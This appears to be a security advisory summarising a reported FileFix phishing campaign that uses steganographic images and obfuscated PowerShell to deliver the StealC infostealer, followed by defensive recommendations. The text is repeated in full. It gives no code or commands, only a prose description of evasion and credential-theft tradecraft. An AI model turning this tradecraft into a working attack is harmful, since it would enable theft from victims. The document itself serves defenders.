New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site
Summary:
Acronis’ Threat Research Unit has identified the first sophisticated in-the-wild use of FileFix, marking a notable evolution of the Fix attack family that includes ClickFix and PromptFix. While FileFix was originally presented as a proof of concept by researcher Mr. d0x in July 2025, this campaign diverges from the POC and demonstrates advanced tradecraft, including phishing infrastructure, multilanguage lures, steganography, and multistage payload delivery. Once triggered, the attack chain executes a heavily obfuscated PowerShell command that downloads AI-generated JPG images containing hidden payloads. Using steganography, the images embed both a second-stage script and encrypted executables. The second stage decrypts and extracts malicious binaries, which are executed with sandbox checks, runtime API decryption, and VM detection to evade analysis.
The final payload is a Go-based loader that deploys the StealC infostealer. StealC is capable of harvesting browser data, cryptocurrency wallets, messaging platforms, VPN credentials, and cloud authentication tokens, while also serving as a downloader for additional malware. Across observed variants, attackers have shifted infrastructure from controlled malicious domains to platforms like Bitbucket for payload hosting, increasing resilience and complicating detection. Acronis researchers observed rapid iteration of this campaign over two weeks, including payload evolution from single-stage to multi-stage scripts, changes in social engineering pretexts, and experimentation with multiple executable types. VirusTotal submissions suggest a global spread with victims across North America, Asia, Europe, and Africa.
Security Officer Comments:
The campaign highlights how quickly proof-of-concept techniques can evolve into operational attack chains, reinforcing the need for security teams to track emerging research closely. The use of steganography within FileFix attacks is particularly concerning, as it allows adversaries to embed and deliver payloads through seemingly benign images, making detection far more difficult. The reliance on multilanguage phishing lures and global infrastructure demonstrates that attackers are targeting a broad victim base, indicating scalability and organized resources behind the operation. The rapid shift from self-hosted domains to legitimate developer platforms such as Bitbucket suggests adversaries are prioritizing stealth and resilience, exploiting trusted services to bypass traditional defenses. The deployment of StealC as the final payload underscores the financial and credential-theft motives of the campaign, while its modular capabilities allow attackers to adapt quickly and expand objectives.
Suggested Corrections:
Organizations should strengthen defenses against FileFix and related Fix attacks through user education and technical controls. Users should be trained to recognize that no legitimate website should ever instruct them to paste commands into system dialogs, file upload address bars, or terminals, and phishing awareness programs should now include Fix-style techniques as a specific focus. From a technical perspective, security teams should restrict the execution of PowerShell, CMD, MSIEXEC, or MSHTA when spawned as child processes of web browsers, since this behavior is highly suspicious and unlikely to be part of normal business activity. Monitoring or blocking images downloaded via PowerShell commands can also disrupt this attack chain, as the payloads are embedded within JPG files using steganography. By enforcing these preventive measures and combining them with endpoint detection capabilities, organizations can significantly reduce the risk of FileFix-style intrusions.
Link(s):
https://thehackernews.com/2025/09/new-filefix-variant-delivers-stealc.html
Acronis’ Threat Research Unit has identified the first sophisticated in-the-wild use of FileFix, marking a notable evolution of the Fix attack family that includes ClickFix and PromptFix. While FileFix was originally presented as a proof of concept by researcher Mr. d0x in July 2025, this campaign diverges from the POC and demonstrates advanced tradecraft, including phishing infrastructure, multilanguage lures, steganography, and multistage payload delivery. Once triggered, the attack chain executes a heavily obfuscated PowerShell command that downloads AI-generated JPG images containing hidden payloads. Using steganography, the images embed both a second-stage script and encrypted executables. The second stage decrypts and extracts malicious binaries, which are executed with sandbox checks, runtime API decryption, and VM detection to evade analysis.
The final payload is a Go-based loader that deploys the StealC infostealer. StealC is capable of harvesting browser data, cryptocurrency wallets, messaging platforms, VPN credentials, and cloud authentication tokens, while also serving as a downloader for additional malware. Across observed variants, attackers have shifted infrastructure from controlled malicious domains to platforms like Bitbucket for payload hosting, increasing resilience and complicating detection. Acronis researchers observed rapid iteration of this campaign over two weeks, including payload evolution from single-stage to multi-stage scripts, changes in social engineering pretexts, and experimentation with multiple executable types. VirusTotal submissions suggest a global spread with victims across North America, Asia, Europe, and Africa.
Security Officer Comments:
The campaign highlights how quickly proof-of-concept techniques can evolve into operational attack chains, reinforcing the need for security teams to track emerging research closely. The use of steganography within FileFix attacks is particularly concerning, as it allows adversaries to embed and deliver payloads through seemingly benign images, making detection far more difficult. The reliance on multilanguage phishing lures and global infrastructure demonstrates that attackers are targeting a broad victim base, indicating scalability and organized resources behind the operation. The rapid shift from self-hosted domains to legitimate developer platforms such as Bitbucket suggests adversaries are prioritizing stealth and resilience, exploiting trusted services to bypass traditional defenses. The deployment of StealC as the final payload underscores the financial and credential-theft motives of the campaign, while its modular capabilities allow attackers to adapt quickly and expand objectives.
Suggested Corrections:
Organizations should strengthen defenses against FileFix and related Fix attacks through user education and technical controls. Users should be trained to recognize that no legitimate website should ever instruct them to paste commands into system dialogs, file upload address bars, or terminals, and phishing awareness programs should now include Fix-style techniques as a specific focus. From a technical perspective, security teams should restrict the execution of PowerShell, CMD, MSIEXEC, or MSHTA when spawned as child processes of web browsers, since this behavior is highly suspicious and unlikely to be part of normal business activity. Monitoring or blocking images downloaded via PowerShell commands can also disrupt this attack chain, as the payloads are embedded within JPG files using steganography. By enforcing these preventive measures and combining them with endpoint detection capabilities, organizations can significantly reduce the risk of FileFix-style intrusions.
Link(s):
https://thehackernews.com/2025/09/new-filefix-variant-delivers-stealc.html